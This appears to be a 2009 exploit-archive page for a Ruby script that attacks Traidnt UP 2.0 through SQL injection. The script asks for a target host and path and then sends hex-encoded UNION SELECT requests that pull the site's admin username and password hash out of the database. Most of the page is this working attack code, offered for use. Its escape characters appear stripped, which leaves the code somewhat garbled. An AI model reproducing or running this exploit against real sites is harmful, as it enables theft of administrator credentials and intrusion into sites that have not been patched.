[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Traidnt UP 2.0 Remote SQL Injection Exploit
# Published : 2009-08-18
# Author : Jafer Al Zidjali
# Previous Title : Best Dating Script Arbitrary Shell Upload Vulnerability
# Next Title : asaher pro 1.0.4 Remote Database Backup Vulnerability


#!/usr/bin/ruby

#=============================================#
#          Traidnt UP v2.0 Exploit            #
#         SQL Injection Vulnerability         #
#---------------------------------------------#
# Date: 05-08-2009                            #
# Discovered & written by: Jafer Al-Zidjali   #
# Email: jafer[at]scorpionds.com              #
# Website: www.scorpionds.com                 #
#---------------------------------------------#
# Conditions:                                 #
#            1. magic_quotes_gpc=OFF          #
# Notes:                                      #
#       1. Author has been notified           #
#       2. A public patch has been released   #
#=============================================#

require "net/http"
require "base64"

intro=[
          "+=============================================+",
          "+          Traidnt UP v2.0 Exploit            +",
          "+        SQL Injection Vulnerability          +",
          "+  Discovered & written by: Jafer Al-Zidjali  +",
          "+         Email: jafer[at]scorpionds.com         +",
          "+         Website: www.scorpionds.com         +",
          "+=============================================+"
          ]

def print_intro text
  w="|"
  text.each do |str|
    str.scan(/./) do |c|
        STDOUT.flush
      if w=="|" 
        print "b"+c +w
        w="/"
      elsif w=="/" 
        print "b"+c +w
        w="-"  
      elsif w=="-" 
        print "b"+c +w
        w="\" 
      else
      print "b"+c +w
      w="|"
      end
      sleep 0.05
    end
    
    print "b "
    puts ""
  end
end

print_intro intro

puts "nEnter host name (e.g. example.com):"
host=gets.chomp

puts "nEnter script path (e.g. /upload/):"
path=gets.chomp


puts "nPress any key to continue..."
opt=gets.chomp
begin
shellcode=
"x76x69x65x77x2ex70x68x70x3fx66x69x6cx65x3dx62x6cx61x68x62x6c"+
"x61x68x27x2bx75x6ex69x6fx6ex2bx73x65x6cx65x63x74x2bx31x2cx63"+
"x6fx6ex63x61x74x28x27x53x54x41x52x54x27x2cx61x64x6dx69x6ex5f"+
"x75x73x65x72x2cx27x45x4ex44x27x29x2cx33x2cx34x2cx35x2cx36x2c"+
"x37x2cx38x2cx39x2cx30x2bx66x72x6fx6dx2bx61x64x6dx69x6ex2bx77"+
"x68x65x72x65x2bx61x64x6dx69x6ex5fx69x64x3dx27x31"

http = Net::HTTP.new(host, 80)
resp= http.get(path+shellcode)
puts "Username: "+(/START(.+)END/).match(resp.body)[1]

shellcode=
"x76x69x65x77x2ex70x68x70x3fx66x69x6cx65x3dx62x6cx61x68x62x6c"+
"x61x68x27x2bx75x6ex69x6fx6ex2bx73x65x6cx65x63x74x2bx31x2cx63"+
"x6fx6ex63x61x74x28x27x53x54x41x52x54x27x2cx61x64x6dx69x6ex5f"+
"x70x61x73x73x77x6fx72x64x2cx27x45x4ex44x27x29x2cx33x2cx34x2c"+
"x35x2cx36x2cx37x2cx38x2cx39x2cx30x2bx66x72x6fx6dx2bx61x64x6d"+
"x69x6ex2bx77x68x65x72x65x2bx61x64x6dx69x6ex5fx69x64x3dx27x31"

http = Net::HTTP.new(host, 80)
resp= http.get(path+shellcode)
puts "Password Hash: "+(/START(.+)END/).match(resp.body)[1]
rescue
puts "Could not fetch data. magic_quotes_gpc probably is ON."
end

# www.Syue.com [2009-08-18]